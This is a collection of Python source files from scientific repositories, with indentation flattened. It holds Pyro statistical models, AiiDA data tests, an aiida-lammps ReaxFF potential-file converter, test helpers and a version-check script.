theta = pyro.sample("theta", dist.HalfCauchy(2.5).expand([2]))
sigma = pyro.sample("sigma", dist.HalfCauchy(2.5))
with torch.no_grad():
epsilon = init_vector("epsilon", dims=T)
epsilon[0] = y[0] - mu
epsilon[1] = y[1] - mu - theta[0] * epsilon[0]
for t in range(2, T):
epsilon[t] = y[t] - mu - theta[0] * epsilon[t - 1] - theta[1] * epsilon[t - 2]
for t in range(2, T):
pyro.sample("y_{}".format(t), dist.Normal(mu + theta[0] * epsilon[t - 1] + \
theta[1] * epsilon[t - 2], sigma), obs=y[t])
```
#### File: pyro_models/misc/stochastic-volatility-optimized.py
```python
import torch
import pyro
import pyro.distributions as dist
def init_vector(name, dims=None):
return pyro.sample(name, dist.Normal(torch.zeros(dims), 0.2 * torch.ones(dims)).to_event(1))
def validate_data_def(data):
assert 'T' in data, 'variable not found in data: key=T'
assert 'y' in data, 'variable not found in data: key=y'
# initialize data
T = data["T"]
y = data["y"]
def init_params(data):
params = {}
# initialize data
T = data["T"]
y = data["y"]
# assign init values for parameters
params["phi"] = pyro.sample("phi", dist.Uniform(-(1), 1))
return params
def model(data, params):
# initialize data
T = data["T"]
y = data["y"]
# init parameters
phi = params["phi"]
# initialize transformed parameters
h = init_vector("h", dims=(T)) # vector
# model block
sigma = pyro.sample("sigma", dist.HalfCauchy(5.))
mu = pyro.sample("mu", dist.Cauchy(0., 10.))
h_std = pyro.sample("h_std", dist.Normal(0., 1.).expand([T]))
with torch.no_grad():
h = h_std * sigma
h[0] = h[0] / torch.sqrt(1. - phi * phi)
h = h + mu
for t in range(1, T):
h[t] = h[t] + phi * (h[t-1] - mu);
y = pyro.sample(y, dist.Normal(0., (h / 2.).exp()), obs=y)
``` |
{
"source": "JPchico/aiida-core",
"score": 2
} |
#### File: orm/data/test_data.py
```python
import os
import numpy
import pytest
from aiida import orm, plugins
from tests.static import STATIC_DIR
@pytest.fixture
@pytest.mark.usefixtures('clear_database_before_test')
def generate_class_instance():
# pylint: disable=too-many-return-statements, too-many-statements
"""Generate a dummy `Data` instance for the given sub class."""
def _generate_class_instance(data_class):
if data_class is orm.CifData:
instance = data_class(file=os.path.join(STATIC_DIR, 'data', 'Si.cif'))
return instance
if data_class is orm.UpfData:
filename = os.path.join(STATIC_DIR, 'pseudos', 'Ba.pbesol-spn-rrkjus_psl.0.2.3-tot-pslib030.UPF')
instance = data_class(file=filename)
return instance
if data_class is orm.StructureData:
instance = orm.CifData(file=os.path.join(STATIC_DIR, 'data', 'Si.cif')).get_structure()
return instance
if data_class is orm.BandsData:
kpoints = orm.KpointsData()
kpoints.set_cell([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
kpoints.set_kpoints([[0., 0., 0.], [0.1, 0.1, 0.1]])
instance = data_class()
instance.set_kpointsdata(kpoints)
instance.set_bands([[1.0, 2.0], [3.0, 4.0]])
return instance
if data_class is orm.TrajectoryData:
instance = data_class()
stepids = numpy.array([60])
times = stepids * 0.01
cells = numpy.array([[[3., 0., 0.], [0., 3., 0.], [0., 0., 3.]]])
positions = numpy.array([[[0., 0., 0.]]])
instance.set_trajectory(stepids=stepids, cells=cells, symbols=['H'], positions=positions, times=times)
return instance
if data_class is orm.UpfData:
filepath_base = os.path.abspath(os.path.join(STATIC_DIR, 'pseudos'))
filepath_carbon = os.path.join(filepath_base, 'C_pbe_v1.2.uspp.F.UPF')
instance = data_class(file=filepath_carbon)
return instance
if data_class is orm.ArrayData:
instance = data_class()
array_data = numpy.identity(3)
instance.set_array('data', array_data)
return instance
if data_class is orm.KpointsData:
instance = data_class()
cell = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
instance.set_cell(cell)
instance.set_kpoints_mesh_from_density(0.5)
return instance
if data_class is orm.XyData:
instance = data_class()
instance.set_x(numpy.arange(5), 'xdata', 'm')
instance.set_y(numpy.arange(5), 'ydata', 'm')
return instance
if data_class is orm.ProjectionData:
my_real_hydrogen_dict = {
'angular_momentum': -3,
'diffusivity': None,
'kind_name': 'As',
'magnetic_number': 0,
'position': [-1.420047044832945, 1.420047044832945, 1.420047044832945],
'radial_nodes': 0,
'spin': 0,
'spin_orientation': None,
'x_orientation': None,
'z_orientation': None
}
kpoints = orm.KpointsData()
kpoints.set_cell([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
kpoints.set_kpoints([[0., 0., 0.]])
bands = orm.BandsData()
bands.set_kpointsdata(kpoints)
bands.set_bands([[1.0]])
RealHydrogen = plugins.OrbitalFactory('core.realhydrogen') # pylint: disable=invalid-name
orbital = RealHydrogen(**my_real_hydrogen_dict)
instance = data_class()
instance.set_reference_bandsdata(bands)
instance.set_projectiondata(
orbital, list_of_pdos=numpy.asarray([1.0]), list_of_energy=numpy.asarray([1.0]), bands_check=False
)
return instance
raise RuntimeError(
'no instance generator implemented for class `{}`. If you have added a `_prepare_*` method '
'for this data class, add a generator of a dummy instance here'.format(data_class)
)
return _generate_class_instance
@pytest.fixture(scope='function', params=plugins.get_entry_points('aiida.data'))
def data_plugin(request):
"""Fixture that parametrizes over all the registered entry points of the ``aiida.data`` entry point group."""
return request.param.load()
@pytest.mark.usefixtures('clear_database_before_test')
def test_constructor():
"""Test the constructor.
Specifically, verify that the ``source`` attribute can be set through a keyword argument.
"""
source = {'id': 1}
node = orm.Data(source=source)
assert isinstance(node, orm.Data)
assert node.source == source
@pytest.mark.usefixtures('clear_database_before_test')
def test_data_exporters(data_plugin, generate_class_instance):
"""Verify that the return value of the export methods of all `Data` sub classes have the correct type.
It should be a tuple where the first should be a byte string and the second a dictionary.
"""
export_formats = data_plugin.get_export_formats()
if not export_formats:
return
instance = generate_class_instance(data_plugin)
for fileformat in export_formats:
content, dictionary = instance._exportcontent(fileformat) # pylint: disable=protected-access
assert isinstance(content, bytes)
assert isinstance(dictionary, dict)
``` |
{
"source": "JPchico/aiida-lammps",
"score": 2
} |
#### File: aiida_lammps/common/reaxff_convert.py
```python
import copy
import re
from aiida_lammps.validation import validate_against_schema
INDEX_SEP = "-"
KEYS_GLOBAL = (
"reaxff0_boc1",
"reaxff0_boc2",
"reaxff3_coa2",
"Triple bond stabilisation 1",
"Triple bond stabilisation 2",
"C2-correction",
"reaxff0_ovun6",
"Triple bond stabilisation",
"reaxff0_ovun7",
"reaxff0_ovun8",
"Triple bond stabilization energy",
"Lower Taper-radius",
"Upper Taper-radius",
"reaxff2_pen2",
"reaxff0_val7",
"reaxff0_lp1",
"reaxff0_val9",
"reaxff0_val10",
"Not used 2",
"reaxff0_pen2",
"reaxff0_pen3",
"reaxff0_pen4",
"Not used 3",
"reaxff0_tor2",
"reaxff0_tor3",
"reaxff0_tor4",
"Not used 4",
"reaxff0_cot2",
"reaxff0_vdw1",
"bond order cutoff",
"reaxff3_coa4",
"reaxff0_ovun4",
"reaxff0_ovun3",
"reaxff0_val8",
"Not used 5",
"Not used 6",
"Not used 7",
"Not used 8",
"reaxff3_coa3",
)
# TODO some variables lammps sets as global are actually species dependant in GULP, how to handle these?
KEYS_1BODY = (
"reaxff1_radii1",
"reaxff1_valence1",
"mass",
"reaxff1_morse3",
"reaxff1_morse2",
"reaxff_gamma",
"reaxff1_radii2",
"reaxff1_valence3",
"reaxff1_morse1",
"reaxff1_morse4",
"reaxff1_valence4",
"reaxff1_under",
"dummy1",
"reaxff_chi",
"reaxff_mu",
"dummy2",
"reaxff1_radii3",
"reaxff1_lonepair2",
"dummy3",
"reaxff1_over2",
"reaxff1_over1",
"reaxff1_over3",
"dummy4",
"dummy5",
"reaxff1_over4",
"reaxff1_angle1",
"dummy11",
"reaxff1_valence2",
"reaxff1_angle2",
"dummy6",
"dummy7",
"dummy8",
)
KEYS_2BODY_BONDS = (
"reaxff2_bond1",
"reaxff2_bond2",
"reaxff2_bond3",
"reaxff2_bond4",
"reaxff2_bo5",
"reaxff2_bo7",
"reaxff2_bo6",
"reaxff2_over",
"reaxff2_bond5",
"reaxff2_bo3",
"reaxff2_bo4",
"dummy1",
"reaxff2_bo1",
"reaxff2_bo2",
"reaxff2_bo8",
"reaxff2_pen1",
)
KEYS_2BODY_OFFDIAG = [
"reaxff2_morse1",
"reaxff2_morse3",
"reaxff2_morse2",
"reaxff2_morse4",
"reaxff2_morse5",
"reaxff2_morse6",
]
KEYS_3BODY_ANGLES = (
"reaxff3_angle1",
"reaxff3_angle2",
"reaxff3_angle3",
"reaxff3_coa1",
"reaxff3_angle5",
"reaxff3_penalty",
"reaxff3_angle4",
)
KEYS_3BODY_HBOND = (
"reaxff3_hbond1",
"reaxff3_hbond2",
"reaxff3_hbond3",
"reaxff3_hbond4",
)
KEYS_4BODY_TORSION = (
"reaxff4_torsion1",
"reaxff4_torsion2",
"reaxff4_torsion3",
"reaxff4_torsion4",
"reaxff4_torsion5",
"dummy1",
"dummy2",
)
DEFAULT_TOLERANCES = (
# ReaxFF angle/torsion bond order threshold,
# for bond orders in valence, penalty and 3-body conjugation
# GULP default: 0.001
("anglemin", 0.001),
# ReaxFF bond order double product threshold,
# for the product of bond orders (1-2 x 2-3, where 2 = pivot)
# Hard coded to 0.001 in original code, but this leads to discontinuities
# GULP default: 0.000001
("angleprod", 0.00001),
# ReaxFF hydrogen-bond bond order threshold
# Hard coded to 0.01 in original code.
# GULP default: 0.01
("hbondmin", 0.01),
# ReaxFF H-bond cutoff
# Hard coded to 7.5 Ang in original code.
# GULP default: 7.5
("hbonddist", 7.5),
# ReaxFF bond order triple product threshold,
# for the product of bond orders (1-2 x 2-3 x 3-4)
# GULP default: 0.000000001
("torsionprod", 0.00001),
)
def split_numbers(string):
"""Get a list of numbers from a string (even with no spacing).
:type string: str
:type as_decimal: bool
:param as_decimal: if True return floats as decimal.Decimal objects
:rtype: list
:Example:
>>> split_numbers("1")
[1.0]
>>> split_numbers("1 2")
[1.0, 2.0]
>>> split_numbers("1.1 2.3")
[1.1, 2.3]
>>> split_numbers("1e-3")
[0.001]
>>> split_numbers("-1-2")
[-1.0, -2.0]
>>> split_numbers("1e-3-2")
[0.001, -2.0]
"""
_match_number = re.compile("-?\\ *[0-9]+\\.?[0-9]*(?:[Ee]\\ *[+-]?\\ *[0-9]+)?")
string = string.replace(" .", " 0.")
string = string.replace("-.", "-0.")
return [float(s) for s in re.findall(_match_number, string)]
def read_lammps_format(lines, tolerances=None):
"""Read a reaxff file, in lammps format, to a standardised potential dictionary.
Parameters
----------
lines : list[str]
tolerances : dict or None
tolerances to set, that are not specified in the file.
Returns
-------
dict
Notes
-----
Default tolerances:
- anglemin: 0.001
- angleprod: 0.001
- hbondmin: 0.01
- hbonddist: 7.5
- torsionprod: 1e-05
"""
output = {
"description": lines[0],
"global": {},
"species": ["X core"], # X is always first
"1body": {},
"2body": {},
"3body": {},
"4body": {},
}
lineno = 1
# Global parameters
if lines[lineno].split()[0] != str(len(KEYS_GLOBAL)):
raise IOError("Expecting {} global parameters".format(len(KEYS_GLOBAL)))
for key in KEYS_GLOBAL:
lineno += 1
output["global"][key] = float(lines[lineno].split()[0])
output["global"][
"reaxff2_pen3"
] = 1.0 # this is not provided by lammps, but is used by GULP
tolerances = tolerances or {}
output["global"].update({k: tolerances.get(k, v) for k, v in DEFAULT_TOLERANCES})
# one-body parameters
lineno += 1
num_species = int(lines[lineno].split()[0])
lineno += 3
idx = 1
for i in range(num_species):
lineno += 1
symbol, values = lines[lineno].split(None, 1)
if symbol == "X":
species_idx = 0 # the X symbol is always assigned index 0
else:
species_idx = idx
idx += 1
output["species"].append(symbol + " core")
values = split_numbers(values)
for _ in range(3):
lineno += 1
values.extend(split_numbers(lines[lineno]))
if len(values) != len(KEYS_1BODY):
raise Exception(
"number of values different than expected for species {0}, "
"{1} != {2}".format(symbol, len(values), len(KEYS_1BODY))
)
key_map = {k: v for k, v in zip(KEYS_1BODY, values)}
key_map["reaxff1_lonepair1"] = 0.5 * (
key_map["reaxff1_valence3"] - key_map["reaxff1_valence1"]
)
output["1body"][str(species_idx)] = key_map
# two-body bond parameters
lineno += 1
num_lines = int(lines[lineno].split()[0])
lineno += 2
for _ in range(num_lines):
values = split_numbers(lines[lineno]) + split_numbers(lines[lineno + 1])
species_idx1 = int(values.pop(0))
species_idx2 = int(values.pop(0))
key_name = "{}-{}".format(species_idx1, species_idx2)
lineno += 2
if len(values) != len(KEYS_2BODY_BONDS):
raise Exception(
"number of bond values different than expected for key {0}, "
"{1} != {2}".format(key_name, len(values), len(KEYS_2BODY_BONDS))
)
output["2body"][key_name] = {k: v for k, v in zip(KEYS_2BODY_BONDS, values)}
# two-body off-diagonal parameters
num_lines = int(lines[lineno].split()[0])
lineno += 1
for _ in range(num_lines):
values = split_numbers(lines[lineno])
species_idx1 = int(values.pop(0))
species_idx2 = int(values.pop(0))
key_name = "{}-{}".format(species_idx1, species_idx2)
lineno += 1
if len(values) != len(KEYS_2BODY_OFFDIAG):
raise Exception(
"number of off-diagonal values different than expected for key {0} (line {1}), "
"{2} != {3}".format(
key_name, lineno - 1, len(values), len(KEYS_2BODY_OFFDIAG)
)
)
output["2body"].setdefault(key_name, {}).update(
{k: v for k, v in zip(KEYS_2BODY_OFFDIAG, values)}
)
# three-body angle parameters
num_lines = int(lines[lineno].split()[0])
lineno += 1
for _ in range(num_lines):
values = split_numbers(lines[lineno])
species_idx1 = int(values.pop(0))
species_idx2 = int(values.pop(0))
species_idx3 = int(values.pop(0))
key_name = "{}-{}-{}".format(species_idx1, species_idx2, species_idx3)
lineno += 1
if len(values) != len(KEYS_3BODY_ANGLES):
raise Exception(
"number of angle values different than expected for key {0} (line {1}), "
"{2} != {3}".format(
key_name, lineno - 1, len(values), len(KEYS_3BODY_ANGLES)
)
)
output["3body"].setdefault(key_name, {}).update(
{k: v for k, v in zip(KEYS_3BODY_ANGLES, values)}
)
# four-body torsion parameters
num_lines = int(lines[lineno].split()[0])
lineno += 1
for _ in range(num_lines):
values = split_numbers(lines[lineno])
species_idx1 = int(values.pop(0))
species_idx2 = int(values.pop(0))
species_idx3 = int(values.pop(0))
species_idx4 = int(values.pop(0))
key_name = "{}-{}-{}-{}".format(
species_idx1, species_idx2, species_idx3, species_idx4
)
lineno += 1
if len(values) != len(KEYS_4BODY_TORSION):
raise Exception(
"number of torsion values different than expected for key {0} (line {1}), "
"{2} != {3}".format(
key_name, lineno - 1, len(values), len(KEYS_4BODY_TORSION)
)
)
output["4body"].setdefault(key_name, {}).update(
{k: v for k, v in zip(KEYS_4BODY_TORSION, values)}
)
# three-body h-bond parameters
num_lines = int(lines[lineno].split()[0])
lineno += 1
for _ in range(num_lines):
values = split_numbers(lines[lineno])
species_idx1 = int(values.pop(0))
species_idx2 = int(values.pop(0))
species_idx3 = int(values.pop(0))
key_name = "{}-{}-{}".format(species_idx1, species_idx2, species_idx3)
lineno += 1
if len(values) != len(KEYS_3BODY_HBOND):
raise Exception(
"number of h-bond values different than expected for key {0} (line {1}), "
"{2} != {3}".format(
key_name, lineno - 1, len(values), len(KEYS_3BODY_HBOND)
)
)
output["3body"].setdefault(key_name, {}).update(
{k: v for k, v in zip(KEYS_3BODY_HBOND, values)}
)
return output
def format_lammps_value(value):
return "{:.4f}".format(value)
def write_lammps_format(data):
"""Write a reaxff file, in lammps format, from a standardised potential dictionary."""
# validate dictionary
validate_against_schema(data, "reaxff.schema.json")
output = [data["description"]]
# Global parameters
output.append("{} ! Number of general parameters".format(len(KEYS_GLOBAL)))
for key in KEYS_GLOBAL:
output.append("{0:.4f} ! {1}".format(data["global"][key], key))
# one-body parameters
output.extend(
[
"{0} ! Nr of atoms; cov.r; valency;a.m;Rvdw;Evdw;gammaEEM;cov.r2;#".format(
len(data["species"])
),
"alfa;gammavdW;valency;Eunder;Eover;chiEEM;etaEEM;n.u.",
"cov r3;Elp;Heat inc.;n.u.;n.u.;n.u.;n.u.",
"ov/un;val1;n.u.;val3,vval4",
]
)
idx_map = {}
i = 1
x_species_line = None
for idx, species in enumerate(data["species"]):
if species.endswith("shell"):
raise ValueError(
"only core species can be used for reaxff, not shell: {}".format(
species
)
)
species = species[:-5]
# X is not always present in 1body, even if it is used in nbody terms
# see e.g. https://github.com/lammps/lammps/blob/master/potentials/ffield.reax.cho
if species == "X" and str(idx) not in data["1body"]:
species_lines = []
else:
species_lines = [
species
+ " "
+ " ".join(
[
format_lammps_value(data["1body"][str(idx)][k])
for k in KEYS_1BODY[:8]
]
),
" ".join(
[
format_lammps_value(data["1body"][str(idx)][k])
for k in KEYS_1BODY[8:16]
]
),
" ".join(
[
format_lammps_value(data["1body"][str(idx)][k])
for k in KEYS_1BODY[16:24]
]
),
" ".join(
[
format_lammps_value(data["1body"][str(idx)][k])
for k in KEYS_1BODY[24:32]
]
),
]
if species == "X":
# X is always index 0, but must be last in the species list
idx_map[str(idx)] = "0"
x_species_line = species_lines
else:
idx_map[str(idx)] = str(i)
i += 1
output.extend(species_lines)
if x_species_line:
output.extend(x_species_line)
# two-body angle parameters
suboutout = []
for key in sorted(data["2body"]):
subdata = data["2body"][key]
if not set(subdata.keys()).issuperset(KEYS_2BODY_BONDS):
continue
suboutout.extend(
[
" ".join([idx_map[k] for k in key.split(INDEX_SEP)])
+ " "
+ " ".join(
[format_lammps_value(subdata[k]) for k in KEYS_2BODY_BONDS[:8]]
),
" ".join(
[format_lammps_value(subdata[k]) for k in KEYS_2BODY_BONDS[8:16]]
),
]
)
output.extend(
[
"{0} ! Nr of bonds; Edis1;LPpen;n.u.;pbe1;pbo5;13corr;pbo6".format(
int(len(suboutout) / 2)
),
"pbe2;pbo3;pbo4;n.u.;pbo1;pbo2;ovcorr",
]
+ suboutout
)
# two-body off-diagonal parameters
suboutout = []
for key in sorted(data["2body"]):
subdata = data["2body"][key]
if not set(subdata.keys()).issuperset(KEYS_2BODY_OFFDIAG):
continue
suboutout.extend(
[
" ".join([idx_map[k] for k in key.split(INDEX_SEP)])
+ " "
+ " ".join(
[format_lammps_value(subdata[k]) for k in KEYS_2BODY_OFFDIAG]
)
]
)
output.extend(
[
"{0} ! Nr of off-diagonal terms; Ediss;Ro;gamma;rsigma;rpi;rpi2".format(
len(suboutout)
)
]
+ suboutout
)
# three-body angle parameters
suboutout = []
for key in sorted(data["3body"]):
subdata = data["3body"][key]
if not set(subdata.keys()).issuperset(KEYS_3BODY_ANGLES):
continue
suboutout.extend(
[
" ".join([idx_map[k] for k in key.split(INDEX_SEP)])
+ " "
+ " ".join([format_lammps_value(subdata[k]) for k in KEYS_3BODY_ANGLES])
]
)
output.extend(
["{0} ! Nr of angles;at1;at2;at3;Thetao,o;ka;kb;pv1;pv2".format(len(suboutout))]
+ suboutout
)
# four-body torsion parameters
suboutout = []
for key in sorted(data["4body"]):
subdata = data["4body"][key]
if not set(subdata.keys()).issuperset(KEYS_4BODY_TORSION):
continue
suboutout.extend(
[
" ".join([idx_map[k] for k in key.split(INDEX_SEP)])
+ " "
+ " ".join(
[format_lammps_value(subdata[k]) for k in KEYS_4BODY_TORSION]
)
]
)
output.extend(
[
"{0} ! Nr of torsions;at1;at2;at3;at4;;V1;V2;V3;V2(BO);vconj;n.u;n".format(
len(suboutout)
)
]
+ suboutout
)
# three-body h-bond parameters
suboutout = []
for key in sorted(data["3body"]):
subdata = data["3body"][key]
if not set(subdata.keys()).issuperset(KEYS_3BODY_HBOND):
continue
suboutout.extend(
[
" ".join([idx_map[k] for k in key.split(INDEX_SEP)])
+ " "
+ " ".join([format_lammps_value(subdata[k]) for k in KEYS_3BODY_HBOND])
]
)
output.extend(
["{0} ! Nr of hydrogen bonds;at1;at2;at3;Rhb;Dehb;vhb1".format(len(suboutout))]
+ suboutout
)
output.append("")
return "\n".join(output)
def filter_by_species(data, species):
"""filter a potential dict by a subset of species
Parameters
----------
data : dict
a potential or fitting dict
species : list[str]
the species to filter by
Returns
-------
dict
data filtered by species and with all species index keys re-indexed
Raises
------
KeyError
if the data does not adhere to the potential or fitting jsonschema
AssertionError
if the filter set is not a subset of the available species
"""
species = sorted(list(set(species)))
if not set(species).issubset(data["species"]):
raise AssertionError(
"the filter set ({}) is not a subset of the available species ({})".format(
set(species), set(data["species"])
)
)
data = copy.deepcopy(data)
indices = set([str(i) for i, s in enumerate(data["species"]) if s in species])
def convert_indices(key):
return INDEX_SEP.join(
[str(species.index(data["species"][int(k)])) for k in key.split(INDEX_SEP)]
)
for key in ["1body", "2body", "3body", "4body"]:
if key not in data:
continue
data[key] = {
convert_indices(k): v
for k, v in data[key].items()
if indices.issuperset(k.split(INDEX_SEP))
}
data["species"] = species
return data
```
#### File: aiida_lammps/tests/test_generate_structure.py
```python
import pytest
from aiida_lammps.common.generate_structure import generate_lammps_structure
@pytest.mark.parametrize(
"structure", ["Fe", "pyrite", "fes_cubic-zincblende", "greigite"]
)
def test_generate(db_test_app, get_structure_data, structure, file_regression):
structure = get_structure_data(structure)
text, transform = generate_lammps_structure(structure, round_dp=8)
file_regression.check(text)
```
#### File: aiida_lammps/tests/utils.py
```python
from collections.abc import Mapping
from contextlib import contextmanager
import distutils.spawn
import os
import re
import subprocess
import sys
TEST_DIR = os.path.dirname(os.path.realpath(__file__))
def lammps_version(executable="lammps"):
"""Get the version of lammps.
we assume `lammps -h` returns e.g. 'LAMMPS (10 Feb 2015)' or
'Large-scale Atomic/Molecular Massively Parallel Simulator - 5 Jun 2019'
"""
out_text = subprocess.check_output([executable, "-h"]).decode("utf8")
match = re.search(r"LAMMPS \((.*)\)", out_text)
if match:
return match.group(1)
regex = re.compile(
r"^Large-scale Atomic/Molecular Massively Parallel Simulator - (.*)$",
re.MULTILINE,
)
match = re.search(regex, out_text)
if match:
return match.group(1).strip()
raise IOError("Could not find version from `{} -h`".format(executable))
def get_path_to_executable(executable):
"""Get path to local executable.
:param executable: Name of executable in the $PATH variable
:type executable: str
:return: path to executable
:rtype: str
"""
path = None
# issue with distutils finding scripts within the python path
# (i.e. those created by pip install)
script_path = os.path.join(os.path.dirname(sys.executable), executable)
if os.path.exists(script_path):
path = script_path
if path is None:
path = distutils.spawn.find_executable(executable)
if path is None:
raise ValueError("{} executable not found in PATH.".format(executable))
return os.path.abspath(path)
def get_or_create_local_computer(work_directory, name="localhost"):
"""Retrieve or setup a local computer
Parameters
----------
work_directory : str
path to a local directory for running computations in
name : str
name of the computer
Returns
-------
aiida.orm.computers.Computer
"""
from aiida.common import NotExistent
from aiida.orm import Computer
try:
computer = Computer.objects.get(label=name)
except NotExistent:
computer = Computer(
label=name,
hostname="localhost",
description=("localhost computer, " "set up by aiida_lammps tests"),
transport_type="local",
scheduler_type="direct",
workdir=os.path.abspath(work_directory),
)
computer.store()
computer.configure()
return computer
def get_or_create_code(entry_point, computer, executable, exec_path=None):
"""Setup code on localhost computer"""
from aiida.common import NotExistent
from aiida.orm import Code, Computer
if isinstance(computer, str):
computer = Computer.objects.get(label=computer)
try:
code = Code.objects.get(
label="{}-{}-{}".format(entry_point, executable, computer.label)
)
except NotExistent:
if exec_path is None:
exec_path = get_path_to_executable(executable)
code = Code(
input_plugin_name=entry_point, remote_computer_exec=[computer, exec_path]
)
code.label = "{}-{}-{}".format(entry_point, executable, computer.label)
code.store()
return code
def get_default_metadata(
max_num_machines=1,
max_wallclock_seconds=1800,
with_mpi=False,
num_mpiprocs_per_machine=1,
):
"""
Return an instance of the metadata dictionary with the minimally required parameters
for a CalcJob and set to default values unless overridden
:param max_num_machines: set the number of nodes, default=1
:param max_wallclock_seconds: set the maximum number of wallclock seconds, default=1800
:param with_mpi: whether to run the calculation with MPI enabled
:param num_mpiprocs_per_machine: set the number of cpus per node, default=1
:rtype: dict
"""
return {
"options": {
"resources": {
"num_machines": int(max_num_machines),
"num_mpiprocs_per_machine": int(num_mpiprocs_per_machine),
},
"max_wallclock_seconds": int(max_wallclock_seconds),
"withmpi": with_mpi,
}
}
def recursive_round(ob, dp, apply_lists=False):
""" map a function on to all values of a nested dictionary """
if isinstance(ob, Mapping):
return {k: recursive_round(v, dp, apply_lists) for k, v in ob.items()}
elif apply_lists and isinstance(ob, (list, tuple)):
return [recursive_round(v, dp, apply_lists) for v in ob]
elif isinstance(ob, float):
return round(ob, dp)
else:
return ob
class AiidaTestApp(object):
def __init__(self, work_directory, executable_map, environment=None):
"""a class providing methods for testing purposes
Parameters
----------
work_directory : str
path to a local work directory (used when creating computers)
executable_map : dict
mapping of computation entry points to the executable name
environment : None or aiida.manage.fixtures.FixtureManager
manager of a temporary AiiDA environment
"""
self._environment = environment
self._work_directory = work_directory
self._executables = executable_map
@property
def work_directory(self):
"""return path to the work directory"""
return self._work_directory
@property
def environment(self):
"""return manager of a temporary AiiDA environment"""
return self._environment
def get_or_create_computer(self, name="localhost"):
"""Setup localhost computer"""
return get_or_create_local_computer(self.work_directory, name)
def get_or_create_code(self, entry_point, computer_name="localhost"):
"""Setup code on localhost computer"""
computer = self.get_or_create_computer(computer_name)
try:
executable = self._executables[entry_point]
except KeyError:
raise KeyError(
"Entry point {} not recognized. Allowed values: {}".format(
entry_point, self._executables.keys()
)
)
return get_or_create_code(entry_point, computer, executable)
@staticmethod
def get_default_metadata(
max_num_machines=1, max_wallclock_seconds=1800, with_mpi=False
):
return get_default_metadata(max_num_machines, max_wallclock_seconds, with_mpi)
@staticmethod
def get_parser_cls(entry_point_name):
"""load a parser class
Parameters
----------
entry_point_name : str
entry point name of the parser class
Returns
-------
aiida.parsers.parser.Parser
"""
from aiida.plugins import ParserFactory
return ParserFactory(entry_point_name)
@staticmethod
def get_data_node(entry_point_name, **kwargs):
"""load a data node instance
Parameters
----------
entry_point_name : str
entry point name of the data node class
Returns
-------
aiida.orm.nodes.data.Data
"""
from aiida.plugins import DataFactory
return DataFactory(entry_point_name)(**kwargs)
@staticmethod
def get_calc_cls(entry_point_name):
"""load a data node class
Parameters
----------
entry_point_name : str
entry point name of the data node class
"""
from aiida.plugins import CalculationFactory
return CalculationFactory(entry_point_name)
def generate_calcjob_node(
self, entry_point_name, retrieved, computer_name="localhost", attributes=None
):
"""Fixture to generate a mock `CalcJobNode` for testing parsers.
Parameters
----------
entry_point_name : str
entry point name of the calculation class
retrieved : aiida.orm.FolderData
containing the file(s) to be parsed
computer_name : str
used to get or create a ``Computer``, by default 'localhost'
attributes : None or dict
any additional attributes to set on the node
Returns
-------
aiida.orm.CalcJobNode
instance with the `retrieved` node linked as outgoing
"""
from aiida.common.links import LinkType
from aiida.orm import CalcJobNode
from aiida.plugins.entry_point import format_entry_point_string
process = self.get_calc_cls(entry_point_name)
computer = self.get_or_create_computer(computer_name)
entry_point = format_entry_point_string("aiida.calculations", entry_point_name)
node = CalcJobNode(computer=computer, process_type=entry_point)
node.set_options(
{
k: v.default() if callable(v.default) else v.default
for k, v in process.spec_options.items()
if v.has_default()
}
)
node.set_option("resources", {"num_machines": 1, "num_mpiprocs_per_machine": 1})
node.set_option("max_wallclock_seconds", 1800)
if attributes:
node.set_attributes(attributes)
node.store()
retrieved.add_incoming(node, link_type=LinkType.CREATE, link_label="retrieved")
retrieved.store()
return node
@contextmanager
def sandbox_folder(self):
"""AiiDA folder object context.
Yields
------
aiida.common.folders.SandboxFolder
"""
from aiida.common.folders import SandboxFolder
with SandboxFolder() as folder:
yield folder
@staticmethod
def generate_calcinfo(entry_point_name, folder, inputs=None):
"""generate a `CalcInfo` instance for testing calculation jobs.
A new `CalcJob` process instance is instantiated,
and `prepare_for_submission` is called to populate the supplied folder,
with raw inputs.
Parameters
----------
entry_point_name: str
folder: aiida.common.folders.Folder
inputs: dict or None
"""
from aiida.engine.utils import instantiate_process
from aiida.manage.manager import get_manager
from aiida.plugins import CalculationFactory
manager = get_manager()
runner = manager.get_runner()
process_class = CalculationFactory(entry_point_name)
process = instantiate_process(runner, process_class, **inputs)
calc_info = process.prepare_for_submission(folder)
return calc_info
```
#### File: aiida-lammps/.pre-commit/check_version.py
```python
import json
import os
import sys
import click
FILENAME_SETUP_JSON = "setup.json"
SCRIPT_PATH = os.path.split(os.path.realpath(__file__))[0]
ROOT_DIR = os.path.join(SCRIPT_PATH, os.pardir)
FILEPATH_SETUP_JSON = os.path.join(ROOT_DIR, FILENAME_SETUP_JSON)
def get_setup_json():
"""Return the `setup.json` as a python dictionary."""
with open(FILEPATH_SETUP_JSON, "r") as handle:
setup_json = json.load(handle) # , object_pairs_hook=OrderedDict)
return setup_json
@click.group()
def cli():
"""Command line interface for pre-commit checks."""
pass
@cli.command("version")
def validate_version():
"""Check that version numbers match.
Check version number in setup.json and aiida_lammos/__init__.py and make sure
they match.
"""
# Get version from python package
sys.path.insert(0, ROOT_DIR)
import aiida_lammps # pylint: disable=wrong-import-position
version = aiida_lammps.__version__
setup_content = get_setup_json()
if version != setup_content["version"]:
click.echo("Version number mismatch detected:")
click.echo(
"Version number in '{}': {}".format(
FILENAME_SETUP_JSON, setup_content["version"]
)
)
click.echo(
"Version number in '{}/__init__.py': {}".format("aiida_lammps", version)
)
click.echo(
"Updating version in '{}' to: {}".format(FILENAME_SETUP_JSON, version)
)
setup_content["version"] = version
with open(FILEPATH_SETUP_JSON, "w") as fil:
# Write with indentation of two spaces and explicitly define separators to not have spaces at end of lines
json.dump(setup_content, fil, indent=2, separators=(",", ": "))
sys.exit(1)
if __name__ == "__main__":
cli() # pylint: disable=no-value-for-parameter
``` |
{
"source": "JPchico/APyInSky",
"score": 3
} |
#### File: APyInSky/src/SK_IO_control.py
```python
def SK_init():
"""Initialization of variables to their defaults values. Reading of the inputfile to gather the necessary data for analysis.
Returns
----------
- Skx_control: (dict) dictionary containing all the needed control parameters
Author
----------
<NAME>
"""
Skx_control=set_control_defaults()
Skx_control=input_gatherer(Skx_control)
return Skx_control
def input_gatherer(Skx_control):
""" Reads the input controller for the script from a yaml file which contains all the necessary input to run APyInSky.
The 'Skx_inp.yml' has the following information in it.
- Data_control:
- Fig_control:
